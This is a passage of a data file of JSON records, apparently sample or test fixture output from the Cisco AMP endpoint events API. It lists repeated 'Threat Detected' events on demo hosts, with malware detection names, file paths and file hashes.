Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":753000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":733000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258878267720000,"timestamp":1610705810,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:16:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258878267719767","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258826728112000,"timestamp":1610705798,"timestamp_nanoseconds":310000000,"date":"2021-01-15T10:16:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258826728112214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251202912551000,"timestamp":1610705786,"timestamp_nanoseconds":262000000,"date":"2021-01-15T10:16:26+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251202912550913","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\Windows\\System32\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258706469028000,"timestamp":1610705770,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:16:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258706469027925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258680699224000,"timestamp":1610705764,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:16:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258680699224148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":428000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":9000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580189","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668361375580000,"timestamp":1610705755,"timestamp_nanoseconds":616000000,"date":"2021-01-15T10:15:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258629159617000,"timestamp":1610705752,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:15:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258629159616595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258577620009000,"timestamp":1610705740,"timestamp_nanoseconds":637000000,"date":"2021-01-15T10:15:40+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258577620009042","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258526080401000,"timestamp":1610705728,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:15:28+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258526080401489","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258474540794000,"timestamp":1610705716,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:15:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258474540793936","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258423001186000,"timestamp":1610705704,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:15:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258423001186383","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} 